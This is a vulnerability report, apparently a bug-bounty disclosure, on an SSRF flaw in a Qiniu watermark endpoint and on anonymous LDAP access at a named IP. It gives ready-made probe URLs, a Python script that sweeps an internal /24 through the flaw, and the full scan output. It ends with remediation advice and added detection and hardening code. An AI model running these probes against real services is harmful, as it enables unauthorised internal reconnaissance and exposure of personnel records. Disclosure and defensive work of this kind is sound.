SSRF on a Qiniu site allows probing the internal network

I. SSRF vulnerability
The vulnerable site appears to be a test site. The interface with the SSRF vulnerability first fetches a remote image and then overlays it as a watermark on the current image. Using Baidu's logo as the demonstration: http://demos.qiniu.com/demo/qimage/index.html

The result looks like this:

http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast

The base64 string after image is the IP and port you want to probe. How do you know which internal IPs exist? In this case one of Qiniu's IPs had already been found to allow unauthenticated Elasticsearch access.

From that we know the internal network contains at least this segment:

<code>172.30.251.168:9200</code>

Encode http://172.30.251.168:9200 as base64 and place it after image.

<code>http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast</code>

If the IP is up and the port is open, a 501 error is returned, e.g. when probing http://172.30.251.168:9200

If the IP is down or the port is closed, a 502 error is returned, e.g. when probing http://172.30.251.168:1356

Testing yields the following pattern.

<code>Returns 403 -- IP up and port open, but access to that path is forbidden

Returns 404 -- IP up and port open, but that image does not exist

Returns 501 -- IP up and port open

Returns 502 -- IP down or port closed</code>
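The same status-code oracle is also the defender's detection signal: every probe has to pass through the watermark endpoint with an image/&lt;base64&gt; parameter, so decoding that parameter from the access log and checking whether it names a non-public address exposes a sweep of the kind this report describes. The following Python is an added example, not code from the original report or from Qiniu; the combined-log format, the client addresses, the sample log lines and the helper names (`decode_image_param`, `classify_target`, `find_internal_probes`) are all constructed for illustration.

```python
import base64
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Combined-log-style line: client, ident, user, [time], "METHOD path proto", status.
# This format is an assumption for the example; adapt the regex to the real log.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_image_param(b64):
    """Decode the image/<b64> segment. Qiniu documents URL-safe base64 for this
    parameter, but the probes in the report used the standard alphabet, so accept
    both alphabets and re-pad; return None when the segment is not base64 at all."""
    std = b64.replace("-", "+").replace("_", "/")
    std += "=" * (-len(std) % 4)
    try:
        return base64.b64decode(std, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def classify_target(url):
    """'internal' for a literal non-public address (private, loopback, link-local...),
    'hostname' for a DNS name (only judgeable after resolution, at enforcement time),
    'public' for a literal globally routable address, 'invalid' if there is no host."""
    host = urlsplit(url).hostname
    if not host:
        return "invalid"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"
    return "public" if addr.is_global else "internal"


def image_param(path):
    """Return the path segment that follows 'image' in a watermark request, or None."""
    segments = path.split("/")
    try:
        return segments[segments.index("image") + 1]
    except (ValueError, IndexError):
        return None


def find_internal_probes(log_text):
    """Map client -> decoded targets for every watermark request whose image
    parameter is a literal non-public address. Order of appearance is kept."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        b64 = image_param(m["path"])
        if b64 is None:
            continue
        target = decode_image_param(b64)
        if target and classify_target(target) == "internal":
            hits[m["client"]].append(target)
    return dict(hits)


def watermark_line(client, remote_url, status="400"):
    """Constructed log line for one watermark request (not real log data); the
    parameter is URL-safe base64 as the service documents it."""
    b64 = base64.urlsafe_b64encode(remote_url.encode()).decode()
    return (f'{client} - - [01/Jan/2015:10:00:00 +0800] '
            f'"GET /1234.jpg?watermark/1/image/{b64}/dissolve/100/gravity/SouthEast HTTP/1.1" {status} 88')


# Constructed sample: one legitimate watermark (the Baidu logo from the report),
# then one client walking internal addresses, plus lines that must be ignored.
SAMPLE_LOG = "\n".join([
    watermark_line("203.0.113.5", "https://www.baidu.com/img/bd_logo1.png", "200"),
    watermark_line("198.51.100.9", "http://172.30.251.168:9200"),
    watermark_line("198.51.100.9", "http://172.30.251.7"),
    watermark_line("198.51.100.9", "http://127.0.0.1:8080/"),
    '198.51.100.9 - - [01/Jan/2015:10:00:04 +0800] "GET /robots.txt HTTP/1.1" 404 0',
    "a line that does not parse at all",
])

if __name__ == "__main__":
    for client, targets in find_internal_probes(SAMPLE_LOG).items():
        print(f"{client}: {len(targets)} internal-address fetch(es): {targets}")
```

A hostname that resolves to an internal address is not caught here, because the log only holds the name; that case belongs to the fetcher's own resolution-time check. A useful second signal is volume: one client issuing dozens of watermark requests for distinct literal addresses in a short window is a sweep even before decoding.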

To make testing easier, I wrote a script that probes whether port 80 is open on each host in the 172.30.251 segment; a 501 error means the IP is up and the port is open. Going one step further, the default logo or favicon.ico could be probed to work out which application a host is running.

<code># coding=utf-8
'''
poc: qiniu_ssrf
url: http://demos.qiniu.com/demo/qimage/index.html
'''
import base64

import requests
from IPy import IP

# Walk every address in the /24 and ask the demo to fetch http://<ip>/ (port 80)
mask = IP('172.30.251.0/24')

for ip in mask:
    print(ip)
    # the demo takes the remote image URL base64-encoded after image/
    b64Domain = base64.b64encode(('http://' + str(ip)).encode()).decode()
    #print(b64Domain)
    req = requests.get("http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/%s/dissolve/100/gravity/SouthEast" % b64Domain)
    print(req.text + "\n")
    # keep the raw response per host so the 403/404/501/502 pattern can be read back later
    with open('/tmp/qnscan.txt', 'a') as qnfile:
        qnfile.write(str(ip) + '\n' + req.text + '\n\n')</code>

These are the results returned:

<code>172.30.251.0

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.1

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.2

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.3

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.4

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.5

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.6

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.7

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.8

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.9

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.10

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.11

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.12

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.13

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.14

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.15

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.16

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.17

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.18

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.19

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.20

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.21

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.22

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.23

{"error":"fetch image url failed and statusCode: 403"}



172.30.251.24

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.25

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.26

{"error":"fetch image url failed and statusCode: 403"}



172.30.251.27

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.28

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.29

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.30

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.31

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.32

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.33

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.34

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.35

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.36

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.37

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.38

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.39

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.40

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.41

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.42

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.43

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.44

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.45

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.46

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.47

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.48

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.49

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.50

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.51

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.52

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.53

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.54

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.55

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.56

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.57

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.58

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.59

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.60

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.61

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.62

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.63

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.64

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.65

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.66

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.67

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.68

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.69

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.70

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.71

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.72

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.73

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.74

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.75

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.76

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.77

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.78

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.79

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.80

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.81

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.82

{"error":"fetch image url failed and statusCode: 503"}



172.30.251.83

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.84

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.85

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.86

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.87

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.88

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.89

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.90

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.91

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.92

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.93

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.94

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.95

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.96

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.97

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.98

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.99

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.100

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.101

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.102

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.103

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.104

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.105

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.106

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.107

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.108

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.109

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.110

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.111

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.112

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.113

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.114

{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-23441q7XWC6pITgES': No such file or directory @ error/constitute.c/ReadImage/540"}



172.30.251.115

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.116

{"error":"fetch image url failed and statusCode: 404"}



172.30.251.117

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.118

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.119

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.120

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.121

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.122

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.123

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.124

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.125

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.126

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.127

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.128

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.129

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.130

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.131

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.132

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.133

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.134

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.135

{"error":"fetch image url failed and statusCode: 404"}



172.30.251.136

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.137

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.138

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.139

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.140

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.141

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.142

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.143

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.144

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.145

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.146

{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-5107kShQhExKivuz': No such file or directory @ error/constitute.c/ReadImage/540"}



172.30.251.147

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.148

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.149

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.150

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.151

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.152

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.153

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.154

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.155

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.156

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.157

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.158

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.159

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.160

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.161

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.162

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.163

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.164

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.165

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.166

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.167

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.168

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.169

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.170

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.171

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.172

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.173

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.174

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.175

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.176

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.177

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.178

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.179

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.180

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.181

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.182

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.183

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.184

{"error":"unsupported format:unsupported format:ERROR_CODER: Entity 'nbsp' not defined\n `No such file or directory` @ error/svg.c/SVGError/2639"}



172.30.251.185

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.186

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.187

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.188

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.189

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.190

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.191

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.192

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.193

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.194

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.195

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.196

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.197

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.198

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.199

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.200

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.201

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.202

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.203

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.204

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.205

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.206

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.207

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.208

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.209

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.210

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.211

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.212

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.213

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.214

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.215

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.216

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.217

{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-24069p9eQJObZhm7U': No such file or directory @ error/constitute.c/ReadImage/540"}



172.30.251.218

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.219

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.220

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.221

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.222

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.223

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.224

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.225

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.226

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.227

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.228

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.229

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.230

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.231

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.232

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.233

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.234

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.235

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.236

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.237

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.238

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.239

{"error":"fetch image url failed and statusCode: 404"}



172.30.251.240

{"error":"fetch image url failed and statusCode: 403"}



172.30.251.241

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}



172.30.251.242

{"error":"fetch image url failed and statusCode: 403"}



172.30.251.243

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.244

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.245

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.246

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.247

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.248

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.249

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.250

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.251

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.252

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.253

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.254

{"error":"fetch image url failed and statusCode: 502"}



172.30.251.255

{"error":"fetch image url failed and statusCode: 502"}</code>

II. Anonymous LDAP access

<code>IP: 115.231.182.75

Port: 389</code>

All of the company's personnel records can be obtained; that information can be used to brute-force mailboxes or any application that authenticates against LDAP.

During testing, an Onion (洋葱) application you had set up (115.231.182.75:8090) was accidentally knocked offline because of a vulnerability; sincere apologies for that.

Proof of vulnerability:

See the detailed description above.

Remediation:

1. SSRF: unify the returned error messages so that a user cannot infer the port state of the remote server from them, and restrict the server so that it cannot fetch from internal IPs.

2. LDAP: disable anonymous access on the LDAP server.
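A concrete shape for fix 1, as an added example that is not the report's or Qiniu's code: the fetcher checks the scheme, the port and every address the host resolves to before connecting, and collapses every failure (rejected, unreachable, upstream 4xx/5xx, decode error) into one identical `GENERIC_ERROR`, so the 403/404/501/502 distinctions this report relied on are no longer visible to the caller. `check_target`, `fetch_watermark`, the allowed-port policy, the fake resolver and its DNS answers are assumptions constructed for this example.

```python
import ipaddress
import logging
import socket
from urllib.parse import urlsplit

log = logging.getLogger("watermark")

# Hypothetical policy for the watermark fetcher: http(s) on the default ports only,
# and only to globally routable addresses.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}
GENERIC_ERROR = {"error": "fetch image url failed"}


class FetchRejected(Exception):
    """Why a fetch was refused; logged server-side, never returned to the client."""


def resolve_all(host):
    """Default resolver: every address the name currently resolves to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def to_address(text):
    """Parse an IP literal, unwrapping IPv4-mapped IPv6 (::ffff:10.0.0.1)."""
    addr = ipaddress.ip_address(text)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr


def check_target(url, resolver=resolve_all):
    """Return the set of addresses the fetch may connect to, or raise FetchRejected.
    A name is rejected if ANY of its addresses is non-public, so a mixed DNS answer
    cannot slip an internal address past the check."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise FetchRejected(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise FetchRejected("missing host")
    try:
        port = parts.port  # ValueError on a malformed port
    except ValueError as exc:
        raise FetchRejected(f"bad port: {exc}")
    if port not in ALLOWED_PORTS:
        raise FetchRejected(f"port not allowed: {port}")
    try:
        addrs = {to_address(host)}
    except ValueError:  # not a literal: resolve the name
        try:
            addrs = {to_address(a) for a in resolver(host)}
        except (OSError, ValueError) as exc:
            raise FetchRejected(f"cannot resolve {host}: {exc}")
    if not addrs or any(not a.is_global for a in addrs):
        raise FetchRejected(f"non-public address for {host}: {sorted(map(str, addrs))}")
    return addrs


def fetch_watermark(url, resolver=resolve_all, fetcher=None):
    """Validate, then fetch through the caller-supplied fetcher, which must connect
    to one of the returned addresses rather than re-resolve the name (otherwise a
    DNS answer that changes between check and connect defeats the check). Every
    failure, whatever its cause, becomes the same GENERIC_ERROR."""
    try:
        addrs = check_target(url, resolver)
        if fetcher is None:
            raise FetchRejected("no fetcher configured")
        return {"ok": True, "bytes": len(fetcher(url, addrs))}
    except FetchRejected as exc:
        log.warning("rejected %s: %s", url, exc)
    except Exception as exc:  # upstream status, timeout, decode failure ...
        log.warning("fetch failed for %s: %s", url, exc)
    return dict(GENERIC_ERROR)


# Constructed DNS answers for the demo (not real records; 8.8.8.8 is only a
# stand-in for "some public address").
FAKE_DNS = {
    "img.example.test": {"8.8.8.8"},
    "intranet.example.test": {"172.30.251.168"},     # the segment from the report
    "mixed.example.test": {"8.8.8.8", "10.0.0.5"},    # public and private together
}


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"unknown host {host}")
    return FAKE_DNS[host]


def fake_fetcher(url, addrs):
    """Stand-in HTTP client that pretends the remote returned a 16-byte image."""
    return b"\x89PNG" + b"\x00" * 12


def failing_fetcher(url, addrs):
    """Stand-in for an upstream timeout / 5xx."""
    raise TimeoutError("upstream timeout")


if __name__ == "__main__":
    for u in ("https://img.example.test/logo.png", "http://intranet.example.test/",
              "http://172.30.251.168:9200", "http://mixed.example.test/a.png",
              "file:///tmp/logo.png", "http://[::ffff:10.0.0.5]/"):
        print(u, "->", fetch_watermark(u, fake_resolver, fake_fetcher))
```

Two layers belong next to this: the fetcher should also bound response size and time, and the worker that performs the fetch should sit behind an egress rule that cannot reach the internal segments at all, so a bug in the validator does not reopen the probe. The pattern of LDAP fix 2 is the same idea at the directory level: an anonymous bind should not be able to enumerate entries.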